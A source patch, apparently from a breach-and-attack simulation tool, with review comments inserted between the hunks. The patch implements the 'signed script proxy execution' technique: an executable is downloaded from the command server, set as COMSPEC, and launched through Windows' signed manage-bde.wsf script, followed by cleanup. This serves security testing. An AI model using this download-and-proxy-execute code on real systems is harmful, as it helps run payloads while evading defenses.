From ba8a7797e6d9491301a1edb5b13400354fe9b43f Mon Sep 17 00:00:00 2001
From: Shreya
Date: Thu, 20 Aug 2020 01:24:47 +0530
Subject: [PATCH] Download exe from the island successfully, delete during pba cleanup

---
 .../signed_script_proxy.py | 2 ++
 .../windows/signed_script_proxy.py | 24 ++++++++++---------
 .../cc/resources/T1216_pba_file_download.py | 11 +++++----
 3 files changed, 22 insertions(+), 15 deletions(-)

diff --git a/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py b/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py
index e3199fc12..4eb55117b 100644
--- a/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py
+++ b/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py
@@ -1,6 +1,7 @@
 import subprocess
 
 from infection_monkey.post_breach.signed_script_proxy.windows.signed_script_proxy import (
+    get_windows_commands_to_delete_temp_comspec,
     get_windows_commands_to_proxy_execution_using_signed_script,
     get_windows_commands_to_reset_comspec)
 from infection_monkey.utils.environment import is_windows_os
@@ -14,3 +15,4 @@ def get_commands_to_proxy_execution_using_signed_script():
 def cleanup_changes(original_comspec):
     if is_windows_os():
         subprocess.run(get_windows_commands_to_reset_comspec(original_comspec), shell=True) # noqa: DUO116
+        subprocess.run(get_windows_commands_to_delete_temp_comspec, shell=True) # noqa: DUO116
diff --git a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py
index aad179640..1e06f453e 100644
--- a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py
+++ b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py
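Review bot: In the `cleanup_changes` hunk the added line passes `get_windows_commands_to_delete_temp_comspec` itself to `subprocess.run` rather than its return value, so on Windows the call raises a TypeError (a function object is not an accepted args value) and the downloaded executable is never removed; the preceding reset line shows the intended form. Change it to `subprocess.run(get_windows_commands_to_delete_temp_comspec(), shell=True) # noqa: DUO116`. Because leaving the dropped file behind is exactly what cleanup exists to prevent, consider running the delete in a `finally` so a failure while resetting comspec does not skip it. `cleanup_changes` is fully visible, but the function named in the hunk header lies outside the hunk.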
@@ -1,27 +1,29 @@
-import shutil
+import os
 import subprocess
-from pathlib import Path
 
 from infection_monkey.control import ControlClient
 
+TEMP_COMSPEC = os.path.join(os.getcwd(), 'random_executable.exe')
+
 
 def get_windows_commands_to_proxy_execution_using_signed_script():
-    # temp_comspec_path = ['infection_monkey', 'post_breach', 'signed_script_proxy', 'windows', 'random_executable.exe']
-    # temp_comspec = Path(*temp_comspec_path)
-    temp_comspec = "c:\\Users\\win\\desktop\\t1216.exe"
-    with ControlClient.get_T1216_pba_file() as r:
-        with open(temp_comspec, 'wb') as f:
-            shutil.copyfileobj(r.raw, f)
+    download = ControlClient.get_T1216_pba_file()
+    with open(TEMP_COMSPEC, 'wb') as file_obj:
+        file_obj.write(download.content)
+        file_obj.flush()
 
     windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n') # noqa: DUO116
-    signed_script_path = [windir_path, 'System32', 'manage-bde.wsf']
-    signed_script = Path(*signed_script_path)
+    signed_script = os.path.join(windir_path, 'System32', 'manage-bde.wsf')
 
     return [
-        f'set comspec={temp_comspec} &&',
+        f'set comspec={TEMP_COMSPEC} &&',
         f'cscript {signed_script}'
     ]
 
 
 def get_windows_commands_to_reset_comspec(original_comspec):
     return f'set comspec={original_comspec}'
+
+
+def get_windows_commands_to_delete_temp_comspec():
+    return f'del {TEMP_COMSPEC} /f'
diff --git a/monkey/monkey_island/cc/resources/T1216_pba_file_download.py b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py
index 16aa43581..104c113f4 100644
--- a/monkey/monkey_island/cc/resources/T1216_pba_file_download.py
+++ b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py
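Review bot: `file_obj.write(download.content)` in get_windows_commands_to_proxy_execution_using_signed_script writes whatever the island returned without checking that the request succeeded, so an error body would be written to TEMP_COMSPEC and then installed as comspec; if `get_T1216_pba_file` returns a requests Response (the removed `r.raw` usage suggests it does), add `download.raise_for_status()` before opening the file. `TEMP_COMSPEC` is interpolated unquoted into `del {TEMP_COMSPEC} /f`, and since it is built from `os.getcwd()` a working directory containing a space breaks the delete; quote it: `return f'del "{TEMP_COMSPEC}" /f'`. The explicit `file_obj.flush()` is redundant because the `with` block closes, and therefore flushes, the file on exit. Resolving the drop location from the current working directory at import time also makes the artifact's location depend on how the agent was launched, which is worth a comment on the constant or a switch to a deliberately chosen directory so cleanup is predictable.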
@@ -1,14 +1,17 @@
-from pathlib import Path
+import os
 
 import flask_restful
 from flask import send_from_directory
 
+from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH
+
 
 class T1216PBAFileDownload(flask_restful.Resource):
     """
     File download endpoint used by monkey to download executable file for T1216 ("Signed Script Proxy Execution" PBA)
     """
+
     def get(self):
-        executable_file_path = ['monkey_island', 'cc', 'resources', 'pba', 'T1216_random_executable.exe']
-        executable_file = Path(*executable_file_path)
-        return send_from_directory(executable_file)
+        executable_file_name = 'T1216_random_executable.exe'
+        return send_from_directory(directory=os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'resources', 'pba'),
+                                   filename=executable_file_name)
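Review bot: `send_from_directory(directory=..., filename=...)` in T1216PBAFileDownload.get relies on the `filename` keyword, which Flask 2.0 renames to `path` and later removes; passing the arguments positionally, `return send_from_directory(os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'resources', 'pba'), executable_file_name)`, works on both the pinned and newer Flask. The file name is a fixed value and reads better as a module-level constant, e.g. `T1216_EXECUTABLE_FILE_NAME = 'T1216_random_executable.exe'`, with a comment that it must match the file shipped under `cc/resources/pba`. No authentication decorator is visible on `get()`; if sibling resources in this package gate their endpoints, confirm this one is intentionally reachable without it (it serves only this one fixed file, so the exposure is limited to that file).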